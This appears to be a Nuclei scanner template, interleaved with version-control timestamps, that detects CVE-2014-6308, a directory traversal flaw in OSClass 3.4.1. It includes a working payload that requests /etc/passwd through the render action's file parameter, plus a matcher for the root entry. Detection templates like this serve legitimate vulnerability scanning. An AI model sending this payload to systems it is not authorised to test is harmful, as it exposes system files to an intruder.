2021-07-21 01:05:30 +00:00
id : CVE-2014-6308
info :
name : Osclass Security Advisory 3.4.1 - Local File Inclusion
author : daffainfo
severity : high
2022-04-22 10:38:41 +00:00
description : A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
2022-02-25 22:07:55 +00:00
reference :
- https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-6308
classification :
cve-id : CVE-2014-6308
2022-04-22 10:38:41 +00:00
tags : cve,cve2014,lfi
2021-07-21 01:05:30 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-21 01:05:30 +00:00
- type : status
status :
- 200
2022-02-25 22:07:55 +00:00
# Enhanced by mp on 2022/02/25